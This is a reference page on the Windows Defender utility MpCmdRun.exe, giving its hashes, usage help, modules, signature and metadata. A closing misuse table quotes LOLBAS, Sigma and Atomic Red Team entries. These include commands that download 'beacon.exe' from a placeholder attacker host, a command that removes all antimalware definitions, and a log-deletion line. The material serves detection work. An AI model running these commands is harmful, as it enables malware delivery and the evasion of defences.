MpCmdRun.exe

  • File Path: C:\Program Files\Windows Defender\MpCmdRun.exe
  • Description: Microsoft Malware Protection Command Line Utility

Hashes

Type Hash
MD5 288D836B81E809EB33CDCCAA9D1AB395
SHA1 AB23FE8381B6D59F9D707E43C72270ABD6A0312B
SHA256 81F85A88DD1829663D5E748CA95709EFF5328444BBDB2C888F85124D939F6899
SHA384 A85379A0D80171212F0C7552566BE0D4F0A1065348EFA54F6CE0B92130447B2443304162ACD0B2B177BA158C34FC49DA
SHA512 D63334732FBB69B2290AABB3EC55B0D7F490E44FFE9B05F8C4CA9613A2BF8269B7EAC23C12E7F6460C0D6C5BA497E8A520A20336FC934F8E3D111E80C5688DE2
SSDEEP 6144:2eM+IYvdO7AePX4cikjqVg09BpapYu8EFpMEf/P:u+IjRPLiPsvdF
IMP FFAEA1E2634A3119C40B178379C9863F
PESHA1 0BBAD52AEF2FEF17FE4395571EAB3A4D790ED280
PE256 7235DCB5C5F73E506A4057112E8502E1DE94AC7AC15CF4C7A49DDD1BBFF6D57E

Runtime Data

Usage (stdout):

Microsoft Antimalware Service Command Line Utility (c) 2006-2018 Microsoft Corp
Use this tool to automate and troubleshoot Microsoft Antimalware Service

Usage:
MpCmdRun.exe [command] [-options]

Command Description
   -? / -h                                    Displays all available options
                                              for this tool
   -Scan [-ScanType #] [-File <path> [-DisableRemediation] [-BootSectorScan]]
         [-Timeout <days>]
         [-Cancel]
                                              Scans for malicious software
   -Trace [-Grouping #] [-Level #]            Starts diagnostic tracing
   -GetFiles                                  Collects support information
   -GetFilesDiagTrack                         Same as Getfiles but outputs to 
                                              temporary DiagTrack folder 
   -RemoveDefinitions [-All]                  Restores the installed
                                              signature definitions
                                              to a previous backup copy or to
                                              the original default set of
                                              signatures
                      [-DynamicSignatures]    Removes only the dynamically
                                              downloaded signatures
   -SignatureUpdate [-UNC | -MMPC]            Checks for new definition updates
   -Restore  [-ListAll | [[-Name <name>] [-All] | [-FilePath <filePath>]] [-Path <path>]]  Restore or list
                                                               quarantined item(s)
   -AddDynamicSignature [-Path]               Loads a dynamic signature
   -ListAllDynamicSignatures                  List the loaded dynamic signatures
   -RemoveDynamicSignature [-SignatureSetID]  Removes a dynamic signature

Additional Information:

Support information will be in the following directory:
C:\ProgramData\Microsoft\Windows Defender\Support

   -Scan [-ScanType value]
        0  Default, according to your configuration
        1  Quick scan
        2  Full system scan
        3  File and directory custom scan

           [-File <path>]
                Indicates the file or directory  to be scanned, only valid for custom scan.

           [-DisableRemediation]
                This option is valid only for custom scan.
                When specified:
                  - File exclusions are ignored.
                  - Archive files are scanned.
                  - Actions are not applied after detection.
                  - Event log entries are not written after detection.
                  - Detections from the custom scan are not displayed in the user interface.
                  - The console output will show the list of detections from the custom scan.

           [-BootSectorScan]
                Enables boot sector scanning; only valid for custom scan.

           [-Timeout <days>]
                Timeout in days; maximum value is 30.
                If this parameter is not specified, default value is 7 days for full scan and 1 day for all other scans.

           [-Cancel]
                Try to cancel any ongoing quick or full scan.

      Return code is
      0    if no malware is found or malware is successfully remediated and no additional user action is required
      2    if malware is found and not remediated or additional user action is required to complete remediation or there is error in scanning.  Please check History for more information.

   -Trace [-Grouping value] [-Level value]
        Begins tracing Microsoft Antimalware Service's actions.
        You can specify the components for which tracing is enabled and
        how much information is recorded.
        If no component is specified, all the components will be logged.
        If no level is specified, the Error, Warning and Informational levels
        will be logged. The data will be stored in the support directory
        as a file having the current timestamp in its name and bearing
        the extension BIN.

        [-Grouping]
        0x1    Service
        0x2    Malware Protection Engine
        0x4    User Interface
        0x8    Real-Time Protection
        0x10   Scheduled actions
        0x20   NIS/GAPA

        [-Level]
        0x1    Errors
        0x2    Warnings
        0x4    Informational messages
        0x8    Function calls
        0x10   Verbose
        0x20   Performance

   -GetFiles
        Gathers the following log files and packages them together in a 
        compressed file in the support directory

        - Any trace files from Microsoft Antimalware Service
        - The Windows Update history log
        - All Microsoft Antimalware Service events from the System event log
        - All relevant Microsoft Antimalware Service registry locations
        - The log file of this tool
        - The log file of the signature update helper tool

   -GetFilesDiagTrack
        Same as GetFiles, but outputs the CAB file to the temp DiagTrack 
        directory

   -RemoveDefinitions
        Restores the last set of signature definitions

        [-All]
        Removes any installed signature and engine files. Use this 
        option if you have difficulties trying to update signatures.

        [-DynamicSignatures]
        Removes all Dynamic Signatures. 

   -SignatureUpdate
        Checks for new definition updates

        [-UNC [-Path <path>]]
        Performs update directly from UNC file share specified in <path>
        If -Path is not specified, update will be performed directly from the
             preconfigured UNC location

        [-MMPC]
        Performs update directly from Microsoft Malware Protection Center

   -Restore
        [-ListAll]
        List all items that were quarantined

        [-Name <name>]
        Restores the most recently quarantined item based on threat name
        One Threat can map to more than one file

        [-All]
        Restores all the quarantined items based on name

        [-FilePath <filePath>]
        Restores quarantined item based on file path

        [-Path]
        Specify the path where the quarantined items will be restored.
        If not specified, the item will be restored to the original path.
   -AddDynamicSignature -Path <path> 
        Adds a Dynamic Signature specified by <path>

   -ListAllDynamicSignatures
        Lists SignatureSet ID's of all Dynamic Signatures added to the client
        via MAPS and MPCMDRUN -AddDynamicSignature

   -RemoveDynamicSignature -SignatureSetID <SignatureSetID> 
        Removes a Dynamic Signature specified by <SignatureSetID>


Loaded Modules:

Path
C:\Program Files\Windows Defender\mpclient.dll
C:\Program Files\Windows Defender\MpCmdRun.exe
C:\Windows\System32\ADVAPI32.dll
C:\Windows\System32\bcrypt.dll
C:\Windows\System32\bcryptPrimitives.dll
C:\Windows\System32\combase.dll
C:\Windows\System32\CRYPT32.dll
C:\Windows\System32\GDI32.dll
C:\Windows\System32\gdi32full.dll
C:\Windows\SYSTEM32\gpapi.dll
C:\Windows\System32\IMM32.DLL
C:\Windows\System32\kernel.appcore.dll
C:\Windows\System32\KERNEL32.DLL
C:\Windows\System32\KERNELBASE.dll
C:\Windows\System32\MSASN1.dll
C:\Windows\System32\msvcp_win.dll
C:\Windows\System32\msvcrt.dll
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\ole32.dll
C:\Windows\System32\OLEAUT32.dll
C:\Windows\System32\profapi.dll
C:\Windows\System32\RPCRT4.dll
C:\Windows\System32\sechost.dll
C:\Windows\SYSTEM32\Secur32.dll
C:\Windows\SYSTEM32\SSPICLI.DLL
C:\Windows\System32\ucrtbase.dll
C:\Windows\System32\USER32.dll
C:\Windows\SYSTEM32\USERENV.dll
C:\Windows\system32\version.dll
C:\Windows\System32\win32u.dll
C:\Windows\System32\WINTRUST.dll

Signature

  • Status: Signature verified.
  • Serial: 33000001C422B2F79B793DACB20000000001C4
  • Thumbprint: AE9C1AE54763822EEC42474983D8B635116C8452
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: MpCmdRun.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 4.18.1807.18075 (GitEnlistment(winpbld).180719-0853)
  • Product Version: 4.18.1807.18075
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/70
  • VirusTotal Link: https://www.virustotal.com/gui/file/81f85a88dd1829663d5e748ca95709eff5328444bbdb2c888f85124d939f6899/detection/

Possible Misuse

The following table contains possible examples of MpCmdRun.exe being misused. While MpCmdRun.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma win_meterpreter_or_cobaltstrike_getsystem_service_start.yml CommandLine\|contains: 'MpCmdRun' DRL 1.0
sigma win_susp_mpcmdrun_download.yml - https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/ DRL 1.0
sigma win_susp_mpcmdrun_download.yml - CommandLine\|contains: 'MpCmdRun.exe' DRL 1.0
LOLBAS MpCmdRun.yml Name: MpCmdRun.exe  
LOLBAS MpCmdRun.yml - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe  
LOLBAS MpCmdRun.yml - Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe  
LOLBAS MpCmdRun.yml - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe  
LOLBAS MpCmdRun.yml - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe  
LOLBAS MpCmdRun.yml - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe  
LOLBAS MpCmdRun.yml - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe  
LOLBAS MpCmdRun.yml - IOC: MpCmdRun storing data into alternate data streams.  
LOLBAS MpCmdRun.yml - IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected.  
LOLBAS MpCmdRun.yml - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.  
LOLBAS MpCmdRun.yml - IOC: Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log  
malware-ioc nukesped_lazarus .MpCmdRun.exe``{:.highlight .language-cmhg} © ESET 2014-2018
atomic-red-team index.md - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1105.md - Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe MIT License. © 2018 Red Canary
atomic-red-team T1105.md ## Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe MIT License. © 2018 Red Canary
atomic-red-team T1105.md More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/ MIT License. © 2018 Red Canary
atomic-red-team T1105.md MpCmdRun.exe -DownloadFile -url #{remote_file} -path #{local_path} MIT License. © 2018 Red Canary
atomic-red-team T1105.md del %temp%\MpCmdRun.log >nul 2>&1 MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md “C:\Program Files\Windows Defender\MpCmdRun.exe” -RemoveDefinitions -All MIT License. © 2018 Red Canary
signature-base apt_golddragon.yar $s7 = “MpCmdRun.dll” fullword ascii CC BY-NC 4.0

MIT License. Copyright (c) 2020-2021 Strontic.